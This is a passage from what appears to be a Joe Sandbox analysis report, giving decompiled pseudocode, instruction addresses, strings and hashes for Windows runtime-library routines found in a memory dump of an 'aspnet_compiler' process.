								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E010E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E010E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01178938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E010DB150();
													}
													_t116 = E01176D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E010E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x11c8638; // 0x0
																	_t122 = L010E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E010E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E010E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0110FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L010E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0110FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0110FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0110FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0110FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0110FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x11c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x11c7b84 = _t75;
						_t73 = E010EEB70(_t134, 0x11c7b60);
						if( *0x11c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E010EFF60( *0x11c7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0110fab0
0x0110fab2
0x0110fab3
0x0110fab4
0x0110fabc
0x0110fac0
0x0110fb14
0x0110fb17
0x0110fac2
0x0110fac8
0x0110facd
0x0110fad3
0x0110fad3
0x0110fadd
0x0110fb18
0x0110fb1b
0x0110fb1d
0x0110fb1e
0x0110fb1f
0x0110fb20
0x0110fb21
0x0110fb22
0x0110fb23
0x0110fb24
0x0110fb25
0x0110fb26
0x0110fb27
0x0110fb28
0x0110fb29
0x0110fb2a
0x0110fb2b
0x0110fb2c
0x0110fb2d
0x0110fb2e
0x0110fb2f
0x0110fb3a
0x0110fb3b
0x0110fb3e
0x0110fb41
0x0110fb44
0x0110fb47
0x0110fb4a
0x0110fb4d
0x0110fb53
0x0114bdcb
0x0114bdcb
0x0110fb59
0x0110fb5b
0x0110fb5b
0x0110fb5e
0x0114bdd5
0x0114bdd8
0x00000000
0x0114bdda
0x00000000
0x0114bdda
0x0110fb64
0x0110fb64
0x0110fb64
0x0110fb67
0x0110fb6e
0x0110fb70
0x0110fb72
0x00000000
0x0110fb78
0x0110fb7a
0x0110fb7a
0x0110fb7d
0x0110fb80
0x0114bddf
0x0114bde1
0x00000000
0x0114bde3
0x00000000
0x0114bde3
0x0110fb86
0x0110fb86
0x0110fb86
0x0110fb8b
0x0110fb90
0x0110fb92
0x0110fb94
0x0110fb9a
0x0110fb9b
0x0110fba1
0x0114bde8
0x0114bdeb
0x0114bded
0x0114beb5
0x0114beb5
0x0114bebb
0x0114bebd
0x0114bec3
0x0114bed2
0x0114bedd
0x0114bedd
0x0114beed
0x00000000
0x0114bdf3
0x0114bdfe
0x0114be06
0x0114be0b
0x0114be0d
0x0114be0f
0x0114be14
0x0114be19
0x0114be20
0x0114be25
0x0114be27
0x0114be35
0x0114be39
0x0114be46
0x0114be4f
0x0114be54
0x0114be56
0x0114bef8
0x0114bef8
0x00000000
0x0114be5c
0x0114be5c
0x0114be60
0x00000000
0x0114be66
0x0114be66
0x0114be7f
0x0114be84
0x0114be87
0x0114be89
0x0114be8b
0x0114be99
0x0114be9d
0x0114bea0
0x0114beac
0x0114beaf
0x0114beb1
0x0114beb3
0x0114beb3
0x00000000
0x0114bea2
0x0114bea2
0x00000000
0x0114bea2
0x0114be8d
0x0114be8d
0x0114be92
0x00000000
0x0114be92
0x0114be8b
0x0114be60
0x0114be3b
0x0114be3b
0x0114be3e
0x00000000
0x0114be40
0x0114be40
0x0114be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0114be44
0x0114be3e
0x0114be29
0x0114be29
0x00000000
0x0114be29
0x0114be27
0x00000000
0x0110fba7
0x0110fba7
0x0110fbab
0x0114bf02
0x0110fbb1
0x0110fbb1
0x0110fbb8
0x0110fbbd
0x0110fbbd
0x0110fbbf
0x0110fbbf
0x0110fbc5
0x0110fbcb
0x0110fbf8
0x0110fbf8
0x0110fbfa
0x00000000
0x0110fc00
0x0110fc00
0x0110fc03
0x00000000
0x0110fc09
0x0110fc09
0x0110fc0f
0x0110fc15
0x0110fc23
0x0110fc23
0x0110fc25
0x0110fc27
0x0110fc75
0x0110fc7c
0x0110fc84
0x00000000
0x0110fc29
0x0110fc29
0x0110fc2d
0x0110fc30
0x0114bf0f
0x00000000
0x0110fc36
0x0110fc38
0x0110fc3b
0x0110fc41
0x0114bf17
0x0114bf19
0x0114bf48
0x0114bf4b
0x00000000
0x0114bf1b
0x0114bf22
0x0114bf24
0x0114bf26
0x00000000
0x0114bf2c
0x0114bf37
0x0114bf39
0x0114bf3b
0x00000000
0x0114bf41
0x0114bf41
0x0114bf41
0x0114bf41
0x0114bf45
0x00000000
0x0114bf45
0x0114bf3b
0x0114bf26
0x00000000
0x0110fc47
0x0110fc47
0x0110fc49
0x0110fcb2
0x0110fcb4
0x0110fcb6
0x0110fcdc
0x0110fcdc
0x00000000
0x0110fcb8
0x0110fcc3
0x0110fcc5
0x0110fcc7
0x00000000
0x0110fcc9
0x0110fcc9
0x0110fccd
0x00000000
0x0110fccd
0x0110fcc7
0x00000000
0x0110fc4b
0x0110fc4b
0x0110fc4e
0x0110fc4e
0x0110fc51
0x0110fc51
0x0110fc54
0x0110fc5a
0x0110fc5c
0x0110fc5f
0x0110fc61
0x0110fc63
0x0110fc65
0x0110fc67
0x0110fc6e
0x0110fc72
0x0110fc72
0x0110fc72
0x0110fc72
0x0110fc67
0x0110fc61
0x00000000
0x0110fc5a
0x0110fc49
0x0110fc41
0x0110fc30
0x0110fc27
0x0110fc03
0x0110fbcd
0x0110fbd3
0x0110fbd9
0x0110fbdc
0x0110fbde
0x0110fc99
0x0110fc9b
0x0110fc9d
0x0110fcd5
0x0110fcd5
0x0110fc89
0x0110fc89
0x00000000
0x0110fc9f
0x0110fc9f
0x0110fca3
0x00000000
0x0110fca3
0x00000000
0x0110fbe4
0x0110fbe4
0x0110fbe4
0x0110fbe4
0x0110fbe9
0x0110fbf2
0x00000000
0x0110fbf2
0x0110fbde
0x0110fbcb
0x0110fbab
0x0110fc8b
0x0110fc8b
0x0110fc8c
0x0110fb80
0x0110fb72
0x0110fb5e
0x0110fc8d
0x0110fc91
0x0110fadf
0x0110fadf
0x0110fae1
0x0110fae4
0x0110fae7
0x0110faec
0x0110faf8
0x0110fb00
0x0110fb07
0x0110fb0f
0x0110fb0f
0x0110fb07
0x00000000
0x0110faf8
0x0110fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0114BE0F

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: a0ce585144d35090f5889fa31d7555566d0aad58a77bc46377971853e1e07390
Instruction ID: f9045327c0dc60e8e0f3a1c2c25d5ddc6ad4d60bf63d015eb175c1cf071c3eeb
Opcode Fuzzy Hash: a0ce585144d35090f5889fa31d7555566d0aad58a77bc46377971853e1e07390
Instruction Fuzzy Hash: 4BA11531F046078FEB3EDB68C456BBAB7A4AF44B24F044569D946DB6C0DBB0D842CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010D2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E010D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x11c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x11c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011197C0();
				}
				if( *0x11c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01101624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E010F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0116FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01119520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0110E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E0112DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x11c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x11c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01119980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E010F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E010F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01157016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0116FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x11c5350;
							if(_t109 != 0x11c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0116FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01165720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x010d2d8a
0x010d2d8a
0x010d2d92
0x010d2d96
0x010d2d9e
0x010d2da0
0x010d2da3
0x010d2da5
0x010d2da8
0x010d2dab
0x010d2db2
0x0112f9aa
0x0112f9ab
0x0112f9ae
0x0112f9ae
0x010d2db8
0x010d2dc2
0x0112f9b9
0x0112f9be
0x0112f9bf
0x0112f9bf
0x010d2dcf
0x0112f9c9
0x010d2dd5
0x010d2dd5
0x010d2dd5
0x010d2dde
0x010d2de1
0x010d2e70
0x010d2e72
0x010d2e72
0x010d2de7
0x010d2deb
0x010d2e7c
0x010d2e83
0x010d2e85
0x010d2e8b
0x010d2e8d
0x010d2e92
0x010d2e92
0x010d2e85
0x010d2df1
0x010d2df7
0x010d2df9
0x010d2df9
0x010d2dfc
0x010d2dff
0x010d2e02
0x00000000
0x010d2e05
0x010d2e0c
0x0112f9d9
0x010d2e12
0x010d2e12
0x010d2e12
0x010d2e1a
0x0112f9e3
0x0112f9e9
0x0112f9f0
0x0112f9f6
0x0112f9f8
0x0112f9f8
0x0112f9f0
0x010d2e23
0x0112fa02
0x0112fa03
0x0112fa05
0x0112fa06
0x00000000
0x010d2e29
0x010d2e29
0x010d2e2e
0x010d2e34
0x010d2e3e
0x00000000
0x00000000
0x010d2e44
0x010d2e47
0x010d2e4d
0x00000000
0x00000000
0x010d2e4f
0x010d2e54
0x00000000
0x00000000
0x010d2e5a
0x010d2e5f
0x010d2e9a
0x010d2ea4
0x010d2ea5
0x010d2ea8
0x010d2eaf
0x010d2eb2
0x010d2eb5
0x0112fae9
0x0112faeb
0x0112faed
0x0112faef
0x0112faf7
0x0112faf8
0x0112fafd
0x0112faff
0x0112fb04
0x0112fb04
0x0112faff
0x010d2ec0
0x010d2ec4
0x010d2ec6
0x010d2ec8
0x0112fb14
0x0112fb18
0x0112fb1e
0x0112fb21
0x0112fb21
0x010d2ece
0x010d2ece
0x010d2ece
0x010d2ed7
0x010d2e61
0x010d2e63
0x0112fa6b
0x0112fa71
0x0112fa76
0x0112fa78
0x0112fa8a
0x0112fa7a
0x0112fa83
0x0112fa83
0x0112fa8f
0x0112fa91
0x0112fa97
0x0112fa9d
0x0112faa4
0x0112faaa
0x0112faaf
0x0112fab1
0x0112fac3
0x0112fab3
0x0112fabc
0x0112fabc
0x0112fac8
0x0112facb
0x0112fadf
0x0112fadf
0x0112facb
0x0112faa4
0x0112fa91
0x010d2e6f
0x010d2e6f
0x010d2e5f
0x0112fa13
0x0112fa15
0x0112fa17
0x0112fa1f
0x0112fa21
0x0112fa22
0x0112fa25
0x0112fa28
0x0112fa2f
0x0112fa2f
0x0112fa2a
0x0112fa2a
0x0112fa2a
0x0112fa31
0x0112fa34
0x0112fa36
0x0112fa3c
0x0112fa3e
0x0112fa41
0x0112fa43
0x0112fa45
0x0112fa45
0x0112fa41
0x0112fa3c
0x0112fa4a
0x0112fa4f
0x0112fa51
0x0112fa53
0x0112fa56
0x0112fa5b
0x0112fa5e
0x00000000
0x0112fa5e
0x010d2e23

Strings

RTL: Re-Waiting, xrefs: 0112FA4A

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 075fbc29c838446ba02a7200d5b727f2fb92cdd724378ac2d6f61f42f9ed7c23
Instruction ID: f5a238536c78d4e984ed13244016bafbb8a25ae1a235557c4d7099fb591d5052
Opcode Fuzzy Hash: 075fbc29c838446ba02a7200d5b727f2fb92cdd724378ac2d6f61f42f9ed7c23
Instruction Fuzzy Hash: DF615431A00756AFEB3ADF6CC840B7EBBF5EF44714F1406A9E991A72C1C77499028781

Uniqueness

Uniqueness Score: -1.00%

Function 010D52A5 Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E010D52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E010EEEF0(0x11c79a0);
					_t104 =  *0x11c8210; // 0xe12d38
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x34000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E010EEB70(_t93, 0x11c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E01119890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E010EEEF0(0x11c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E010EEB70(0, 0x11c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xe12d5002
								_t13 = _t104 + 0xc; // 0xe12d45
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0110F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E010EEEF0(0x11c79a0);
									__eflags =  *0x11c8210 - _t104; // 0xe12d38
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x11c8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000e12d
											_t95 =  *((intOrPtr*)( *_t37));
											E01154888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E010EEB70(_t95, 0x11c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E011195D0();
											L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E011195D0();
											L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E010EEB70(_t93, 0x11c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E011195D0();
										L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E011195D0();
										L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000e12d
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xe12d5002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0110F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x010d52a5
0x010d52ad
0x010d52b0
0x010d52b3
0x010d52b7
0x010d52ba
0x010d52bf
0x010d52c4
0x010d52cc
0x00000000
0x00000000
0x010d52ce
0x010d52d1
0x010d52d9
0x010d52dd
0x010d52e7
0x010d52f7
0x010d52f9
0x010d52fd
0x01130dcf
0x01130dd5
0x01130dd6
0x01130dd7
0x01130dd8
0x01130dd9
0x01130dde
0x01130ddf
0x01130de0
0x01130de1
0x01130de2
0x01130de2
0x01130de5
0x01130dea
0x01130dec
0x01130f60
0x01130f64
0x01130f70
0x01130f76
0x01130f79
0x01130f79
0x00000000
0x01130f64
0x01130df2
0x01130df7
0x01130e04
0x01130e04
0x01130e0d
0x01130e0d
0x01130e10
0x01130e1a
0x01130e1c
0x01130e4c
0x01130e52
0x01130e61
0x01130e67
0x01130e6b
0x01130e70
0x01130e76
0x01130ed7
0x01130edc
0x01130ee0
0x01130ee6
0x01130eea
0x01130eed
0x01130ef0
0x01130ef3
0x01130ef6
0x01130ef9
0x01130efb
0x01130efe
0x01130f01
0x01130f01
0x01130f0b
0x01130f12
0x01130f16
0x01130f18
0x01130f18
0x01130f1b
0x01130f2c
0x01130f31
0x01130f31
0x01130f35
0x01130f39
0x01130f3a
0x01130f3c
0x01130f3c
0x01130f3f
0x01130f50
